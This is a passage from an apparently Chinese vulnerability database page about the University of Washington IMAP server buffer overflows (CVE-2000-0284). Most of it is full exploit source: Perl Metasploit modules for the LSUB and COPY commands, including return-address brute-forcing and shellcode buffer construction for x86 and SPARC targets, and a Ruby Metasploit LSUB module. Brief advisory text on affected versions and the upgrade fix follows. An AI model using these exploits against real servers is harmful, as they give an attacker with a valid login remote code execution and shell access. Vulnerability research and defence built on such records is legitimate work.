		my $s = Login($self);
		if($s == -1)
		{
			return;
		}

		$self->PrintLine(sprintf("[*] Trying return address 0x%.8x...", $curr_ret));
		$s->Send(sprintf("1 LSUB \"\" {%i}\r\n", $target->[5]));
		$s->Recv(-1);
		$s->Send($target->[6]->($curr_ret, $shellcode) . "\r\n");

		$self->Handler($s);
		$s->Close();
		undef($s);
	}

	return;
}

sub Check {
	my $self = shift;

	my $s = Login($self);
	if($s == -1)
	{
		return;
	}

	$s->Send("1 LSUB \"\" {1096}\r\n");
	$s->Recv(-1);
	$s->Send(Pex::Text::AlphaNumText(1096) . "\r\n");
	my $reply = $s->Recv(-1);

	if(!$reply)
	{
		$self->PrintLine("[*] Vulnerable server.");
		return $self->CheckCode('Confirmed');
	}

	$self->PrintLine("[*] Server is probably not vulnerable.");
	return $self->CheckCode('Safe');
}



sub Login {
	my $self = shift;

	my $user = $self->GetVar('USER');
	my $pass = $self->GetVar('PASS');

	my $sock = Msf::Socket::Tcp->new
	(
		'PeerAddr'  => $self->GetVar('RHOST'), 
		'PeerPort'  => $self->GetVar('RPORT'), 
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	);
	if ($sock->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $sock->GetError);
		return -1;
	}

	$sock->Recv(-1);
	$sock->Send(sprintf("1 LOGIN \"%s\" \"%s\"\r\n", $user, $pass));
	my $reply = $sock->Recv(-1);
	if(!$reply || $reply !~ /1 OK/)
	{
		$self->PrintLine('[*] Authentication failed.');
		return -1;
	}
	undef($reply);

	return $sock;
}

sub Payloadx86 {
	my $ret = shift;
	my $sc = shift;

	my $buf;

# XXX: More precise.
	$buf = $sc . pack("V", $ret) x 96;

	return $buf;
}

sub PayloadSPARC {
	my $ret = shift;
	my $sc = shift; 

	my $buf;

	$buf = substr($sc, 0, 1032 - 680) . $sc . pack("N", $ret - 32) x 15 . pack("N", $ret) x 3;

	return $buf;
}
		

- 漏洞信息 (19849)

UoW imapd 10.234/12.264 COPY Buffer Overflow (meta) (EDBID:19849)
unix remote
2000-04-16 Verified
0 vlad902
N/A [点击下载]
source: http://www.securityfocus.com/bid/1110/info
  
A buffer overflow exists in imapd. The vulnerability exists in the list command. By supplying a long, well-crafted string as the second argument to the list command, it becomes possible to execute code on the machine.
  
Executing the list command requires an account on the machine. In addition, privileges have been dropped in imapd prior to the location of the buffer overrun. As such, this vulnerability would only be useful in a scenario where a user has an account, but no shell level access. This would allow them to gain shell access.
  
Overflows have also been found in the COPY, LSUB, RENAME and FIND command. All of these, like the LIST command, require a login on the machine. 

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::uow_imap4_copy;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced =
{
	'AlignPayload' => [1, 'What boundary to align on'],
};
my $info =
{
	'Name'  => 'University of Washington IMAP4 COPY Overflow',
	'Version'  => '$Revision: 1.17 $',
	'Authors' => [ 'vlad902 <vlad902 [at] gmail.com>', ],
	'Arch'  => [ 'x86', 'sparc' ],
	'OS'    => [ 'bsd', 'linux' ],
	'Priv'  => 0,
	'UserOpts'  => {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 143],
		'USER'  => [1, 'DATA', 'User name'],
		'PASS'  => [1, 'DATA', 'Password'],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
	},
	'Payload' => {
		'Space' => 1000,
		'MinNops' => 700,
		'BadChars' => "\x00/",
		'Keys' => ['+findsock', '+inetd'],
	},
	'Description'  => Pex::Text::Freeform(qq{
		This exploits a buffer overflow in the COPY command. An overly long
		argument causes a classic stack buffer overflow.

		Snort's imap.rules detects the LIST, RENAME, LSUB, and FIND overflows 
		but does not catch COPY (12/10/04).
	}),
	'Refs'  =>  [  
		['BID', 1110],
		['OSVDB', 12037],
	],
	'Targets' => [ 
		[ "Linux / x86 stack bruteforce", 0xbffffcd0, 0xbfa00000, 700, 1096, \&Payloadx86 ],
		[ "FreeBSD / x86 stack bruteforce", 0xbfbffcd0, 0xbf100000, 700, 1096, \&Payloadx86 ],
# These 2 could be consolidated and you'd get 5-6 useless hits on Linux but it's better this way.
		[ "NetBSD / sun4m stack bruteforce", 0xeffffcd0, 0xefa00000, 720, 1084, \&PayloadSPARC ],
		[ "Linux / sun4m stack bruteforce", 0xefffecd0, 0xefa00000, 720, 1084, \&PayloadSPARC ],
		[ "OpenBSD / sun4m stack bruteforce", 0xf7fffca0, 0xf7a00000, 720, 1084, \&PayloadSPARC ],
	],
	'Keys'  => ['imap'],
};

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit {
	my $self = shift;
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;

	my $target = $self->Targets->[$target_idx];
	my $curr_ret;

	if (! $self->InitNops(128))
	{
		$self->PrintLine("[*] Failed to initialize the nop module.");
		return;
	}
	
	$self->PrintLine(sprintf("[*] Starting bruteforce mode for target %s.", $target->[0]));

	for (
		$curr_ret  = $target->[1];
		$curr_ret >= $target->[2];
		$curr_ret -= $target->[3]
	)
	{
		if(!($curr_ret & 0xff) || ($curr_ret & 0xff) == 0x20)
		{
			$curr_ret += 4;
		}
		if(!($curr_ret & 0xff00) || ($curr_ret & 0xff00) == 0x2000)
		{
			$curr_ret -= 0x0100;
		}

		my $s = Login($self);
		if($s == -1)
		{
			return;
		}

		$self->PrintLine(sprintf("[*] Trying return address 0x%.8x...", $curr_ret));
		$s->Send(sprintf("1 UID COPY 1:2 {%i}\r\n", $target->[4] + 1));
		$s->Recv(-1);
		$s->Send(Pex::Text::AlphaNumText($self->GetVar('AlignPayload')) . $target->[5]->($self, $curr_ret, $shellcode) . "\r\n");

		$self->Handler($s);
		$s->Close();
		undef($s);
	}

	return;
}

sub Check {
	my $self = shift;

	my $s = Login($self);
	if($s == -1)
	{
		return;
	}

	$s->Send("1 UID COPY 1:2 {1096}\r\n");
	$s->Recv(-1);
	$s->Send(Pex::Text::AlphaNumText(1096) . "\r\n");
	my $reply = $s->Recv(-1);

	if(!$reply)
	{
		$self->PrintLine("[*] Vulnerable server.");
		return $self->CheckCode('Confirmed');
	}

	$self->PrintLine("[*] Server is probably not vulnerable.");
	return $self->CheckCode('Safe');
}


sub Login {
	my $self = shift;

	my $user = $self->GetEnv('USER');
	my $pass = $self->GetEnv('PASS');

	my $sock = Msf::Socket::Tcp->new
	(
		'PeerAddr'  => $self->GetVar('RHOST'), 
		'PeerPort'  => $self->GetVar('RPORT'), 
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	);
	if ($sock->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $sock->GetError);
		return -1;
	}

	$sock->Send(sprintf("1 LOGIN \"%s\" \"%s\"\r\n", $user, $pass));
	my $reply = $sock->Recv(-1);
	if(!$reply || $reply !~ /1 OK/)
	{
		$self->PrintLine('[*] Authentication failed.');
		return -1;
	}
	undef($reply);

# XXX: Create random dirname
	$sock->Send("1 CREATE MISC\r\n");
	$sock->Recv(-1);
	$sock->Send("1 SELECT MISC\r\n");
	$sock->Recv(-1);

	return $sock;
}


sub Payloadx86 {
	my $self = shift;
	my $ret = shift;
	my $sc = shift;

	my $buf;

# XXX: More precision.
	$buf = $sc . pack("V", $ret) x 24;

	return $buf;
}

sub PayloadSPARC {
	my $self = shift;
	my $ret = shift;
	my $sc = shift; 

	my $buf;

	$buf = $self->MakeNops(20) . $sc . pack("N", $ret) x 16;

	return $buf;
}

sub PayloadPrependEncoder {
	my $self = shift;
	my $target_idx  = $self->GetVar('TARGET');
	my $target = $self->Targets->[$target_idx];

	if($target->[0] =~ /x86/)
	{
		return "\x66\x81\xec\xe8\x03";
	}
	elsif($target->[0] =~ /sun4/)
	{
		return "\x9c\x23\xa3\xe8";
	}
}
		

- 漏洞信息 (F82240)

UoW IMAP Server LSUB Buffer Overflow (PacketStormID:F82240)
2009-10-27 00:00:00
patrick  
exploit,overflow,imap
CVE-2000-0284
[点击下载]

This Metasploit module exploits a buffer overflow in the 'LSUB' command of the University of Washington IMAP service. This vulnerability can only be exploited with a valid username and password.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Imap

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'UoW IMAP server LSUB Buffer Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in the 'LSUB'
				command of the University of Washington IMAP service.
				This vulnerability can only be exploited with a valid username
				and password.
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2000-0284' ],
					[ 'OSVDB', '12037' ],
					[ 'BID', '1110' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/284' ],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 964,
					'BadChars' => "\x00\x0a\x0d",
					'StackAdjustment' => -3500,
					'Compat'   => 
						{
							'ConnectionType' => '-reverse',
						},
				},
			'Platform'       => 'linux',	
			'Targets'        => 
				[
					['RedHat 6.2 - IMAP4rev1 v12.264', { 'Ret' => 0xbffff310 }],
				],
			'DisclosureDate' => 'Apr 16 2000',
			'DefaultTarget' => 0))
	end

	def check
		connect
		disconnect

		if (banner =~ /IMAP4rev1 v12.264/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe

	end

	def exploit
		connect_login

		print_status("Sending overflow string...")
		req = "a002 LSUB \"\" {1064}\r\n"
		sock.put(req)
		sleep(2)

		sploit = payload.encoded + rand_text_alphanumeric(64) + [target['Ret']].pack('V') + rand_text_alphanumeric(32) + "\r\n"

		sock.put(sploit)
		sleep(2)

		handler
		disconnect
	end

end

    

- 漏洞信息

12037
UoW imapd (UW-IMAP) Multiple Command Remote Overflows
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

A remote overflow exists in the University of Washington IMAP server. The IMAP server fails to verify input length of arguments to the LIST, COPY, RENAME, FIND, and LSUB commands commands resulting in buffer overflows. With a specially crafted request, an attacker can cause arbitrary code execution with the privileges of the user resulting in a loss of integrity.

- 时间线

2000-04-16 Unknow
2000-04-16 Unknow

- 解决方案

Upgrade to imap-2000 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Univ. Of Washington imapd Buffer Overflow Vulnerabilities
Boundary Condition Error 1110
Yes No
2000-04-16 12:00:00 2009-07-11 01:56:00
This vulnerability was posted to the Bugtraq mailing list on April 16, 2000 by Michal Zalewski <lcamtuf@tpi.pl>

- 受影响的程序版本

University of Washington imapd 12.264
- FreeBSD FreeBSD 4.0
- FreeBSD FreeBSD 3.4
- FreeBSD FreeBSD 3.3
- FreeBSD FreeBSD 3.2
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
University of Washington imapd 10.234

- 漏洞讨论

A buffer overflow exists in imapd. The vulnerability exists in the list command. By supplying a long, well-crafted string as the second argument to the list command, it becomes possible to execute code on the machine.

Executing the list command requires an account on the machine. In addition, privileges have been dropped in imapd prior to the location of the buffer overrun. As such, this vulnerability would only be useful in a scenario where a user has an account, but no shell level access. This would allow them to gain shell access.

Overflows have also been found in the COPY, LSUB, RENAME and FIND command. All of these, like the LIST command, require a login on the machine.

- 漏洞利用

Exploits have been released as part of the MetaSploit Framework 2.3.

An exploit was contributed by Gabriel A. Maggiotti &lt;gmaggiot@ciudad.com.ar&gt;:

- 解决方案

This is a historical vulnerability database entry. Fixes may have been released which address this issue, however they may have not been included in the database. The analyst team will be retroactively updating the information in the vulnerability report.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站